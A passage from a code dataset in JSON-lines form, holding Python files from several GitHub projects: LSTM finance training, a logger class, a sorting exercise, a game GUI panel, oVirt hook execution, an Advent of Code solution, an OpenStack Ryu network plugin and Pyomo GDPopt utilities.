es=EarlyStopping(monitor='val_loss',mode='min',verbose=2,patience=25) \n checkpoint = ModelCheckpoint('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/BestModelInceptionLSTM.hdf5', monitor='val_loss', verbose=1, save_best_only=True, mode='min',period=10) \n# tensorboard = TensorBoard(log_dir=r\"D:\\ML for Finance\\data\\logs\\{}\".format(time()),histogram_freq=10,write_graph=True,write_images=True,update_freq=\"epoch\")\n #tensorboard\n callback_List = [es, checkpoint] \n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(ii) +'lookBackYear' +str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n X_train=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(ii) +'lookBackYear' +str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n y_train=pickle.load( handle)\n\n result=model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs,callbacks = callback_List, validation_split=0.1,verbose=2)\n validation_acc = np.amin(result.history['val_loss'])\n print('Best validation acc of epoch:', -validation_acc)\n\n \n \n model_json = model.to_json()\n with open('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/ ' + modelName +'Model' + str(ii) + 'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.json',\"w\") as json_file:\n json_file.write(model_json)\n \n best_model.save_weights('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/ ' + modelName +'ModelWeights' + str(ii) +'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.h5')\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n ValidationData=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n ValidationTarget=pickle.load( handle)\n \n with open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/indexObjectYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.csv', 'rb') as handle:\n validationIndex=pd.read_csv( handle,parse_dates=['1']) \n# \n validationIndex.rename(columns={'0':'entityID', '1':'date'},inplace=True) \n validationIndex.set_index(['entityID','date'],inplace=True,drop=False)\n validationIndex.drop(columns='Unnamed: 0',inplace=True)\n\n \n \n pred1=best_model.predict(ValidationData, batch_size=2000)\n print(2)\n pred1=pd.DataFrame(pred1)\n pred1['targets']=ValidationTarget\n pred1['entityID']=validationIndex['entityID'].values\n pred1['date']=validationIndex['date'].values\n pred1.set_index(['entityID','date'],inplace=True)\n pred1.to_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/data' + modelName +'Prediction' + str(ii) +'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.csv')\n\n","repo_name":"SteffenRoe/4376-DL-Project","sub_path":"InceptionLSTMFor100.py","file_name":"InceptionLSTMFor100.py","file_ext":"py","file_size_in_byte":16915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37306967782","text":"\"\"\"\nLogger is a class to manage log output and format so that we\ndon't have to pass loggers into methods or classes in order\nto get the desired results.\n\"\"\"\n\nimport logging\n\nclass Logger(object):\n \"\"\"\n Logger class that is a little messy and requires you to run\n configure() before using any of the other methods. Not in love\n with this setup but it allow me to not pepper logging throughout\n the application and have to pass it down 3 levels to get it to the\n proper class.\n \"\"\"\n logger = \"\"\n\n @classmethod\n def configure(cls):\n \"\"\"\n Create configuration for logger and change\n the default format that it uses.\n \"\"\"\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger_handler = logging.StreamHandler()\n logger.addHandler(logger_handler)\n logger_handler.setFormatter(logging.Formatter('%(message)s'))\n cls.logger = logger\n\n @classmethod\n def info(cls, string, *opts):\n \"\"\"\n Print info out to screen\n \"\"\"\n cls.logger.info(string, *opts)\n","repo_name":"michaeljs1990/compress","sub_path":"compress/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"32387641043","text":"def maxPro(arr): # 최댓값 구하는 함수\n maxV = arr[0]\n for a in arr:\n if maxV < a:\n maxV = a\n return maxV\n\ndef toString(string): # 숫자 리스트를 문자열로 바꾸는 함수\n res = ''\n for s in string:\n res += str(s) + ' '\n return res\n\nT = int(input()) #test case 개수\n\nfor tc in range(1, T+1):\n N = int(input())\n nums = list(map(int, input().split()))\n cnt = [0] * int(maxPro(nums) + 1) # (nums의 최대 숫자 +1)개를 갖는 배열\n temp = [0] * N # 새로 정리된 숫자를 받을 배열\n\n for num in nums:\n cnt[num] += 1 # nums의 수를 확인하고, 그 수로 인덱스를 갖는 곳에 1 추가\n # print(cnt)\n for i in range(1, len(cnt)): # 누적합\n cnt[i] = cnt[i-1] + cnt[i]\n # print(cnt)\n # print(len(nums)-1)\n # print('----------------')\n for i in range(len(nums)-1, -1, -1): # i = 배열의 끝 인덱스부터 하나씩 내려올거야\n cnt[nums[i]] -= 1 # nums[i]번째 값을 인덱스로 갖는 cnt의 값을 하나 줄여준다.\n # print(cnt)\n # print(nums[i])\n temp[cnt[nums[i]]] = nums[i] # 하나 줄인값을 인덱스로 갖�� temp값에 nums[i]넣는다.\n\n print(f'#{tc} {toString(temp)}')","repo_name":"better-gyeom/Python_Algorithm","sub_path":"SWEA/D2/1966. 숫자를 정렬하자/숫자를 정렬하자.py","file_name":"숫자를 정렬하자.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40713871693","text":"from direct.gui.DirectGui import *\nfrom pandac.PandaModules import *\nfrom direct.directnotify import DirectNotifyGlobal\nfrom otp.otpbase import OTPGlobals\nfrom pirates.piratesgui import PDialog\nfrom pirates.piratesgui import GuiPanel\nfrom pirates.piratesgui import PiratesGuiGlobals\nfrom pirates.piratesbase import PiratesGlobals\nfrom pirates.piratesbase import PLocalizer\nfrom pirates.band import BandConstance\nfrom pirates.piratesgui.RequestButton import RequestButton\n\nclass CrewInviteeButton(RequestButton):\n \n def __init__(self, text, command):\n RequestButton.__init__(self, text, command)\n self.initialiseoptions(CrewInviteeButton)\n\n\n\nclass CrewInvitee(GuiPanel.GuiPanel):\n notify = DirectNotifyGlobal.directNotify.newCategory('CrewInvitee')\n \n def __init__(self, avId, avName):\n GuiPanel.GuiPanel.__init__(self, 'Crew Invitation', 0.5, 0.5, showClose = False)\n self.initialiseoptions(CrewInvitee)\n self.setPos(0.15, 0, 0.25)\n self.avId = avId\n self.avName = avName\n if base.cr.avatarFriendsManager.checkIgnored(self.avId):\n self.__handleNo()\n return\n \n text = PLocalizer.CrewInviteeInvitation % self.avName\n self.message = DirectLabel(parent = self, relief = None, text = text, text_scale = PiratesGuiGlobals.TextScaleLarge, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_wordwrap = 11, pos = (0.25, 0, 0.35), textMayChange = 1)\n self.bOk = CrewInviteeButton(text = PLocalizer.CrewInviteeOK, command = self.__handleOk)\n self.bOk.reparentTo(self)\n self.bOk.setPos(0.1, 0, 0.05)\n self.bNo = CrewInviteeButton(text = PLocalizer.CrewInviteeNo, command = self.__handleNo)\n self.bNo.reparentTo(self)\n self.bNo.setPos(0.3, 0, 0.05)\n self.accept('BandRequestCancel-%s' % (self.avId,), self.__handleCancelFromAbove)\n \n def destroy(self):\n if hasattr(self, 'destroyed'):\n return\n \n self.destroyed = 1\n self.ignore('BandRequestCancel-%s' % (self.avId,))\n self.ignore('Esc')\n GuiPanel.GuiPanel.destroy(self)\n \n def __handleOk(self):\n base.cr.PirateBandManager.d_invitationResponce(self.avId, BandConstance.outcome_ok)\n self.destroy()\n\n def __handleNo(self):\n base.cr.PirateBandManager.d_invitationResponce(self.avId, BandConstance.outcome_declined)\n self.destroy()\n \n def __handleCancelFromAbove(self):\n self.destroy()\n\n\n","repo_name":"PiratesOnlineClassic/pirates-online-classic","sub_path":"pirates/piratesgui/CrewInvitee.py","file_name":"CrewInvitee.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"3213324052","text":"import logging\nimport os\n\nfrom ovirt.node import base\nfrom ovirt.node.utils import process\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Hooks(base.Base):\n \"\"\"A utility class which executes files for additional configuration\n beyond the normal install\n \"\"\"\n\n known = [\"pre-upgrade\", \"post-upgrade\", \"rollback\", \"on-boot\",\n \"on-changed-boot-image\"]\n\n legacy_hooks_directory = \"/etc/ovirt-config-boot.d/\"\n hooks_path_tpl = \"/usr/libexec/ovirt-node/hooks/{name}\"\n\n @staticmethod\n def post_auto_install():\n Hooks.__run(Hooks.legacy_hooks_directory)\n\n @staticmethod\n def emit(name):\n \"\"\"Signal that a specific event appeared, and trigger the hook handlers\n\n Args:\n name: Name of the hook (bust be in Hooks.known)\n \"\"\"\n assert name in Hooks.known\n path = Hooks.hooks_path_tpl.format(name=name)\n Hooks.__run(path)\n\n @staticmethod\n def __run(hooks_directory):\n for hook in os.listdir(hooks_directory):\n script = os.path.join(hooks_directory, hook)\n\n if script.endswith(\".pyc\") or script.endswith(\".pyo\"):\n continue\n\n LOGGER.debug(\"Running hook %s\" % script)\n if script.endswith(\".py\"):\n output = process.check_output([\"python\", script])\n else:\n output = process.check_output(\"%s &> /dev/null\" % script,\n shell=True)\n\n [LOGGER.debug(\"%s: %s\" % (script, line)) for line in output]\n","repo_name":"oVirt/ovirt-node","sub_path":"src/ovirt/node/utils/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"} +{"seq_id":"35335162899","text":"# https://adventofcode.com/2017/day/3\n\nfrom collections import defaultdict\nfrom itertools import count\n\ndef spiral(Δ = 1j):\n i = 1; yield 1, 0 # i, pos\n for side_len in count(3, step=2):\n pos = (1 - 1j) * (side_len//2)\n for _ in range(4):\n for _ in range(side_len-1):\n i += 1; pos += Δ\n yield i, pos\n Δ *= 1j\n\ndef fst_star(stop):\n abs_int = lambda x: abs(int(x))\n for x, pos in spiral():\n if x == stop: \n return sum(map(abs_int, [pos.real, pos.imag]))\n\ndef snd_star(stop):\n grid = defaultdict(int, {0: 1})\n for i, pos in spiral():\n if i == 1: continue\n grid[pos] = sum( \n grid[pos + Δ] \n for Δ in [\n -1+1j, 1j, 1+1j, \n -1 , 1, \n -1-1j, -1j, 1-1j, \n ]\n )\n if grid[pos] > stop: return grid[pos]\n\nif __name__ == '__main__':\n assert fst_star(1) == 0\n assert fst_star(12) == 3\n assert fst_star(23) == 2\n assert fst_star(1024) == 31\n\n print(fst_star(265149))\n print(snd_star(265149))\n\n","repo_name":"andy1li/adventofcode","sub_path":"2017/day03_spiral.py","file_name":"day03_spiral.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21972020219","text":"from ryu.app import client\nfrom ryu.app.client import ignore_http_not_found\nfrom ryu.app import rest_nw_id\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import exc as orm_exc\n\nfrom quantum.common import constants as q_const\nfrom quantum.common import exceptions as q_exc\nfrom quantum.common import topics\nfrom quantum.db import api as db\nfrom quantum.db import db_base_plugin_v2\nfrom quantum.db.dhcp_rpc_base import DhcpRpcCallbackMixin\nfrom quantum.db import l3_db\nfrom quantum.db import models_v2\nfrom quantum.openstack.common import cfg\nfrom quantum.openstack.common import log as logging\nfrom quantum.openstack.common import rpc\nfrom quantum.openstack.common.rpc import dispatcher\nfrom quantum.plugins.ryu.common import config\nfrom quantum.plugins.ryu.db import api_v2 as db_api_v2\nfrom quantum.plugins.ryu import ofp_service_type\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass RyuQuantumPluginV2(db_base_plugin_v2.QuantumDbPluginV2,\n l3_db.L3_NAT_db_mixin):\n\n supported_extension_aliases = [\"router\"]\n\n def __init__(self, configfile=None):\n options = {\"sql_connection\": cfg.CONF.DATABASE.sql_connection}\n options.update({'base': models_v2.model_base.BASEV2})\n reconnect_interval = cfg.CONF.DATABASE.reconnect_interval\n options.update({\"reconnect_interval\": reconnect_interval})\n db.configure_db(options)\n\n self.tunnel_key = db_api_v2.TunnelKey(\n cfg.CONF.OVS.tunnel_key_min, cfg.CONF.OVS.tunnel_key_max)\n ofp_con_host = cfg.CONF.OVS.openflow_controller\n ofp_api_host = cfg.CONF.OVS.openflow_rest_api\n\n if ofp_con_host is None or ofp_api_host is None:\n raise q_exc.Invalid(_('invalid configuration. check ryu.ini'))\n\n hosts = [(ofp_con_host, ofp_service_type.CONTROLLER),\n (ofp_api_host, ofp_service_type.REST_API)]\n db_api_v2.set_ofp_servers(hosts)\n\n self.client = client.OFPClient(ofp_api_host)\n self.tun_client = client.TunnelClient(ofp_api_host)\n for nw_id in rest_nw_id.RESERVED_NETWORK_IDS:\n if nw_id != rest_nw_id.NW_ID_UNKNOWN:\n self.client.update_network(nw_id)\n self._setup_rpc()\n\n # register known all network list on startup\n self._create_all_tenant_network()\n\n def _setup_rpc(self):\n self.conn = rpc.create_connection(new=True)\n self.callback = DhcpRpcCallbackMixin()\n self.dispatcher = dispatcher.RpcDispatcher([self.callback])\n self.conn.create_consumer(topics.PLUGIN, self.dispatcher, fanout=False)\n self.conn.consume_in_thread()\n\n def _create_all_tenant_network(self):\n for net in db_api_v2.network_all_tenant_list():\n self.client.update_network(net.id)\n for tun in self.tunnel_key.all_list():\n self.tun_client.update_tunnel_key(tun.network_id, tun.tunnel_key)\n session = db.get_session()\n for port_binding in db_api_v2.port_binding_all_list(session):\n network_id = port_binding.network_id\n dpid = port_binding.dpid\n port_no = port_binding.port_no\n try:\n port = session.query(models_v2.Port).filter(\n models_v2.Port.id == port_binding.port_id).one()\n except orm_exc.NoResultFound:\n continue\n except orm_exc.MultipleResultsFound:\n continue\n\n self.client.update_port(network_id, dpid, port_no)\n self.client.update_mac(network_id, dpid, port_no, port.mac_address)\n\n def _client_create_network(self, net_id, tunnel_key):\n self.client.create_network(net_id)\n self.tun_client.create_tunnel_key(net_id, tunnel_key)\n\n def _client_delete_network(self, net_id):\n client.ignore_http_not_found(\n lambda: self.client.delete_network(net_id))\n client.ignore_http_not_found(\n lambda: self.tun_client.delete_tunnel_key(net_id))\n\n def create_network(self, context, network):\n session = context.session\n with session.begin(subtransactions=True):\n net = super(RyuQuantumPluginV2, self).create_network(context,\n network)\n self._process_l3_create(context, network['network'], net['id'])\n self._extend_network_dict_l3(context, net)\n\n tunnel_key = self.tunnel_key.allocate(session, net['id'])\n try:\n self._client_create_network(net['id'], tunnel_key)\n except:\n self._client_delete_network(net['id'])\n raise\n\n return net\n\n def update_network(self, context, id, network):\n session = context.session\n with session.begin(subtransactions=True):\n net = super(RyuQuantumPluginV2, self).update_network(context, id,\n network)\n self._process_l3_update(context, network['network'], id)\n self._extend_network_dict_l3(context, net)\n return net\n\n def delete_network(self, context, id):\n self._client_delete_network(id)\n session = context.session\n with session.begin(subtransactions=True):\n self.tunnel_key.delete(session, id)\n super(RyuQuantumPluginV2, self).delete_network(context, id)\n\n def get_network(self, context, id, fields=None):\n net = super(RyuQuantumPluginV2, self).get_network(context, id, None)\n self._extend_network_dict_l3(context, net)\n return self._fields(net, fields)\n\n def get_networks(self, context, filters=None, fields=None):\n nets = super(RyuQuantumPluginV2, self).get_networks(context, filters,\n None)\n for net in nets:\n self._extend_network_dict_l3(context, net)\n nets = self._filter_nets_l3(context, nets, filters)\n\n return [self._fields(net, fields) for net in nets]\n\n def delete_port(self, context, id, l3_port_check=True):\n with context.session.begin(subtransactions=True):\n port = self._get_port(context, id)\n net_id = port.network_id\n try:\n port_binding = db_api_v2.port_binding_destroy(context.session,\n port.id, net_id)\n datapath_id = port_binding.dpid\n port_no = port_binding.port_no\n ignore_http_not_found(\n lambda: self.client.delete_port(net_id, datapath_id,\n port_no))\n except q_exc.PortNotFound:\n pass\n\n # if needed, check to see if this is a port owned by\n # and l3-router. If so, we should prevent deletion.\n if l3_port_check:\n self.prevent_l3_port_deletion(context, id)\n self.disassociate_floatingips(context, id)\n return super(RyuQuantumPluginV2, self).delete_port(context, id)\n\n def update_port(self, context, id, port):\n p = super(RyuQuantumPluginV2, self).update_port(context, id, port)\n net_id = p['network_id']\n mac_address = p['mac_address']\n\n deleted = port['port'].get('deleted', False)\n if deleted:\n session = context.session\n try:\n db_api_v2.port_binding_destroy(session, id, net_id)\n except q_exc.PortNotFound:\n pass\n db_api_v2.set_port_status(session, id, q_const.PORT_STATUS_DOWN)\n return p\n\n datapath_id = port['port'].get('datapath_id', None)\n port_no = port['port'].get('port_no', None)\n if datapath_id is None or port_no is None:\n LOG.debug('p %s', p)\n return p\n\n try:\n port_binding = db_api_v2.port_binding_get(id, net_id)\n except orm_exc.NoResultFound:\n try:\n db_api_v2.port_binding_create(id, net_id, datapath_id, port_no)\n except IntegrityError:\n # TODO:XXX should do transaction?\n return p\n else:\n self.client.create_port(net_id, datapath_id, port_no)\n self.client.create_mac(net_id, datapath_id, port_no,\n mac_address)\n else:\n if (port_binding.dpid != datapath_id or\n port_binding.port_no != port_no):\n variables = {'datapath_id': datapath_id,\n 'port_no': port_no,\n 'port_binding_dpid': port_binding.dpid,\n 'port_binding_port_no': port_binding.port_no}\n raise q_exc.InvalidInput(\n error_message=_('invalid (datapath_id, port_no) '\n 'is requested'\n '(%(datapath_id)s, %(port_no)s), acutal'\n '(%(port_binding_dpid)s, '\n '%(port_binding_port_no)s)') % variables)\n self.client.update_network(net_id)\n self.client.update_port(net_id, datapath_id, port_no)\n self.client.update_mac(net_id, datapath_id, port_no, mac_address)\n return p\n","repo_name":"virt2x/folsomCloud","sub_path":"cloud/quantum/quantum/plugins/ryu/ryu_quantum_plugin.py","file_name":"ryu_quantum_plugin.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29699440561","text":"\"\"\"Utility functions and classes for the GDPopt solver.\"\"\"\nfrom __future__ import division\n\nimport logging\nfrom math import fabs, floor, log\n\nfrom pyomo.core import (Any, Binary, Block, Constraint, NonNegativeReals,\n Objective, Reals, Var, minimize, value)\nfrom pyomo.core.expr import current as EXPR\nfrom pyomo.core.kernel import ComponentSet\nfrom pyomo.gdp import Disjunct, Disjunction\nfrom pyomo.opt import SolverFactory\nfrom pyomo.opt.results import ProblemSense, SolverResults\n\n\nclass _DoNothing(object):\n \"\"\"Do nothing, literally.\n\n This class is used in situations of \"do something if attribute exists.\"\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n pass\n\n def __call__(self, *args, **kwargs):\n pass\n\n def __getattr__(self, attr):\n def _do_nothing(*args, **kwargs):\n pass\n return _do_nothing\n\n\nclass GDPoptSolveData(object):\n \"\"\"Data container to hold solve-instance data.\n\n Key attributes:\n - original_model: the original model that the user gave us to solve\n - working_model: the original model after preprocessing\n - linear_GDP: the linear-discrete master problem\n\n \"\"\"\n pass\n\n\ndef model_is_valid(solve_data, config):\n \"\"\"Validate that the model is solveable by GDPopt.\n\n Also preforms some preprocessing such as moving the objective to the\n constraints.\n\n \"\"\"\n m = solve_data.working_model\n GDPopt = m.GDPopt_utils\n\n # Handle LP/NLP being passed to the solver\n prob = solve_data.results.problem\n if (prob.number_of_binary_variables == 0 and\n prob.number_of_integer_variables == 0 and\n prob.number_of_disjunctions == 0):\n config.logger.info('Problem has no discrete decisions.')\n if len(GDPopt.working_nonlinear_constraints) > 0:\n config.logger.info(\n \"Your model is an NLP (nonlinear program). \"\n \"Using NLP solver %s to solve.\" % config.nlp)\n SolverFactory(config.nlp).solve(\n solve_data.original_model, **config.nlp_options)\n return False\n else:\n config.logger.info(\n \"Your model is an LP (linear program). \"\n \"Using LP solver %s to solve.\" % config.mip)\n SolverFactory(config.mip).solve(\n solve_data.original_model, **config.mip_options)\n return False\n\n # Handle missing or multiple objectives\n objs = list(m.component_data_objects(\n ctype=Objective, active=True, descend_into=True))\n num_objs = len(objs)\n solve_data.results.problem.number_of_objectives = num_objs\n if num_objs == 0:\n config.logger.warning(\n 'Model has no active objectives. Adding dummy objective.')\n GDPopt.dummy_objective = Objective(expr=1)\n main_obj = GDPopt.dummy_objective\n elif num_objs > 1:\n raise ValueError('Model has multiple active objectives.')\n else:\n main_obj = objs[0]\n solve_data.working_objective_expr = main_obj.expr\n\n # Move the objective to the constraints\n\n # TODO only move the objective if nonlinear?\n GDPopt.objective_value = Var(domain=Reals, initialize=0)\n solve_data.objective_sense = main_obj.sense\n if main_obj.sense == minimize:\n GDPopt.objective_expr = Constraint(\n expr=GDPopt.objective_value >= main_obj.expr)\n solve_data.results.problem.sense = ProblemSense.minimize\n else:\n GDPopt.objective_expr = Constraint(\n expr=GDPopt.objective_value <= main_obj.expr)\n solve_data.results.problem.sense = ProblemSense.maximize\n main_obj.deactivate()\n GDPopt.objective = Objective(\n expr=GDPopt.objective_value, sense=main_obj.sense)\n\n # TODO if any continuous variables are multipled with binary ones, need\n # to do some kind of transformation (Glover?) or throw an error message\n return True\n\n\ndef a_logger(str_or_logger):\n \"\"\"Returns a logger when passed either a logger name or logger object.\"\"\"\n if isinstance(str_or_logger, logging.Logger):\n return str_or_logger\n else:\n return logging.getLogger(str_or_logger)\n\n\ndef copy_var_list_values(from_list, to_list, config, skip_stale=False):\n \"\"\"Copy variable values from one list to another.\"\"\"\n for v_from, v_to in zip(from_list, to_list):\n if skip_stale and v_from.stale:\n continue # Skip stale variable values.\n try:\n v_to.set_value(value(v_from, exception=False))\n if skip_stale:\n v_to.stale = False\n except ValueError as err:\n if 'is not in domain Binary' in err.message:\n # Check to see if this is just a tolerance issue\n v_from_val = value(v_from, exception=False)\n if (fabs(v_from_val - 1) <= config.integer_tolerance or\n fabs(v_from_val) <= config.integer_tolerance):\n v_to.set_value(round(v_from_val))\n else:\n raise\n\n\ndef is_feasible(model, config):\n \"\"\"Checks to see if the algebraic model is feasible in its current state.\n\n Checks variable bounds and active constraints. Not for use with\n untransformed GDP models.\n\n \"\"\"\n disj = next(model.component_data_objects(\n ctype=Disjunct, active=True), None)\n if disj is not None:\n raise NotImplementedError(\n \"Found active disjunct %s. \"\n \"This function is not intended to check \"\n \"feasibility of disjunctive models, \"\n \"only transformed subproblems.\" % disj.name)\n\n config.logger.debug('Checking if model is feasible.')\n for constr in model.component_data_objects(\n ctype=Constraint, active=True, descend_into=True):\n # Check constraint lower bound\n if (constr.lower is not None and (\n value(constr.lower) - value(constr.body)\n >= config.constraint_tolerance\n )):\n config.logger.info('%s: body %s < LB %s' % (\n constr.name, value(constr.body), value(constr.lower)))\n return False\n # check constraint upper bound\n if (constr.upper is not None and (\n value(constr.body) - value(constr.upper)\n >= config.constraint_tolerance\n )):\n config.logger.info('%s: body %s > UB %s' % (\n constr.name, value(constr.body), value(constr.upper)))\n return False\n for var in model.component_data_objects(ctype=Var, descend_into=True):\n # Check variable lower bound\n if (var.has_lb() and\n value(var.lb) - value(var) >= config.variable_tolerance):\n config.logger.info('%s: %s < LB %s' % (\n var.name, value(var), value(var.lb)))\n return False\n # Check variable upper bound\n if (var.has_ub() and\n value(var) - value(var.ub) >= config.variable_tolerance):\n config.logger.info('%s: %s > UB %s' % (\n var.name, value(var), value(var.ub)))\n return False\n config.logger.info('Model is feasible.')\n return True\n\n\ndef clone_orig_model_with_lists(original_model):\n \"\"\"Clones the original model to create a working model.\n\n Also attaches ordered lists of the variables, constraints, disjuncts, and\n disjunctions to the model so that they can be used for mapping back and\n forth.\n\n \"\"\"\n build_ordered_component_lists(original_model, prefix='orig')\n return original_model.clone()\n\n\ndef build_ordered_component_lists(model, prefix='working'):\n \"\"\"Define lists used for future data transfer.\"\"\"\n GDPopt = model.GDPopt_utils\n var_set = ComponentSet()\n setattr(\n GDPopt, '%s_constraints_list' % prefix, list(\n model.component_data_objects(\n ctype=Constraint, active=True,\n descend_into=(Block, Disjunct))))\n setattr(\n GDPopt, '%s_disjuncts_list' % prefix, list(\n model.component_data_objects(\n ctype=Disjunct, descend_into=(Block, Disjunct))))\n setattr(\n GDPopt, '%s_disjunctions_list' % prefix, list(\n model.component_data_objects(\n ctype=Disjunction, active=True,\n descend_into=(Disjunct, Block))))\n\n # Identify the non-fixed variables in (potentially) active constraints\n for constr in getattr(GDPopt, '%s_constraints_list' % prefix):\n for v in EXPR.identify_variables(constr.body, include_fixed=False):\n var_set.add(v)\n # Disjunct indicator variables might not appear in active constraints. In\n # fact, if we consider them Logical variables, they should not appear in\n # active algebraic constraints. For now, they need to be added to the\n # variable set.\n for disj in getattr(GDPopt, '%s_disjuncts_list' % prefix):\n var_set.add(disj.indicator_var)\n\n # We use component_data_objects rather than list(var_set) in order to\n # preserve a deterministic ordering.\n setattr(\n GDPopt, '%s_var_list' % prefix, list(\n v for v in model.component_data_objects(\n ctype=Var, descend_into=(Block, Disjunct))\n if v in var_set))\n setattr(\n GDPopt, '%s_nonlinear_constraints' % prefix, [\n v for v in getattr(GDPopt, '%s_constraints_list' % prefix)\n if v.body.polynomial_degree() not in (0, 1)])\n\n\ndef record_original_model_statistics(solve_data, config):\n \"\"\"Record problem statistics for original model and setup SolverResults.\"\"\"\n # Create the solver results object\n res = solve_data.results = SolverResults()\n prob = res.problem\n origGDPopt = solve_data.original_model.GDPopt_utils\n res.problem.name = solve_data.working_model.name\n res.problem.number_of_nonzeros = None # TODO\n # TODO work on termination condition and message\n res.solver.termination_condition = None\n res.solver.message = None\n # TODO add some kind of timing\n res.solver.user_time = None\n res.solver.system_time = None\n res.solver.wallclock_time = None\n res.solver.termination_message = None\n\n # Classify the variables\n orig_binary = sum(1 for v in origGDPopt.orig_var_list if v.is_binary())\n orig_continuous = sum(\n 1 for v in origGDPopt.orig_var_list if v.is_continuous())\n orig_integer = sum(1 for v in origGDPopt.orig_var_list if v.is_integer())\n\n # Get count of constraints and variables\n prob.number_of_constraints = len(origGDPopt.orig_constraints_list)\n prob.number_of_disjunctions = len(origGDPopt.orig_disjunctions_list)\n prob.number_of_variables = len(origGDPopt.orig_var_list)\n prob.number_of_binary_variables = orig_binary\n prob.number_of_continuous_variables = orig_continuous\n prob.number_of_integer_variables = orig_integer\n\n config.logger.info(\n \"Original model has %s constraints (%s nonlinear) \"\n \"and %s disjunctions, \"\n \"with %s variables, of which %s are binary, %s are integer, \"\n \"and %s are continuous.\" %\n (prob.number_of_constraints,\n len(origGDPopt.orig_nonlinear_constraints),\n prob.number_of_disjunctions,\n prob.number_of_variables,\n orig_binary,\n orig_integer,\n orig_continuous))\n\n\ndef record_working_model_statistics(solve_data, config):\n \"\"\"Record problem statistics for preprocessed model.\"\"\"\n GDPopt = solve_data.working_model.GDPopt_utils\n now_binary = sum(1 for v in GDPopt.working_var_list if v.is_binary())\n now_continuous = sum(\n 1 for v in GDPopt.working_var_list if v.is_continuous())\n now_integer = sum(1 for v in GDPopt.working_var_list if v.is_integer())\n assert now_integer == 0, \"Unreformulated, unfixed integer variables found.\"\n\n config.logger.info(\n \"After preprocessing, model has %s constraints (%s nonlinear) \"\n \"and %s disjunctions, \"\n \"with %s variables, of which %s are binary and %s are continuous.\" %\n (len(GDPopt.working_constraints_list),\n len(GDPopt.working_nonlinear_constraints),\n len(GDPopt.working_disjunctions_list),\n len(GDPopt.working_var_list),\n now_binary,\n now_continuous))\n\n\ndef reformulate_integer_variables(model, config):\n integer_vars = list(\n v for v in model.component_data_objects(\n ctype=Var, descend_into=(Block, Disjunct))\n if v.is_integer() and not v.fixed)\n if len(integer_vars) == 0:\n return # if no free integer variables, no reformulation needed.\n\n if config.reformulate_integer_vars_using is None:\n config.logger.warning(\n \"Model contains unfixed integer variables. \"\n \"GDPopt will reformulate using base 2 binary variables \"\n \"by default. To specify a different method, see the \"\n \"reformulate_integer_vars_using configuration option.\")\n config.reformulate_integer_vars_using = 'base2_binary'\n\n config.logger.info(\n \"Reformulating integer variables using the %s strategy.\"\n % config.reformulate_integer_vars_using)\n\n # Set up reformulation block\n reform_block = model.GDPopt_utils.integer_reform = Block(\n doc=\"Holds variables and constraints for reformulating \"\n \"integer variables to binary variables.\")\n reform_block.new_binary_var = Var(\n Any, domain=Binary, dense=False,\n doc=\"Binary variable with index (int_var.name, indx)\")\n reform_block.integer_to_binary_constraint = Constraint(\n Any, doc=\"Equality constraints mapping the binary variable values \"\n \"to the integer variable value.\")\n\n # check that variables are bounded and non-negative\n for int_var in integer_vars:\n if not (int_var.has_lb() and int_var.has_ub()):\n raise ValueError(\n \"Integer variable %s is missing an \"\n \"upper or lower bound. LB: %s; UB: %s. \"\n \"GDPopt does not support unbounded integer 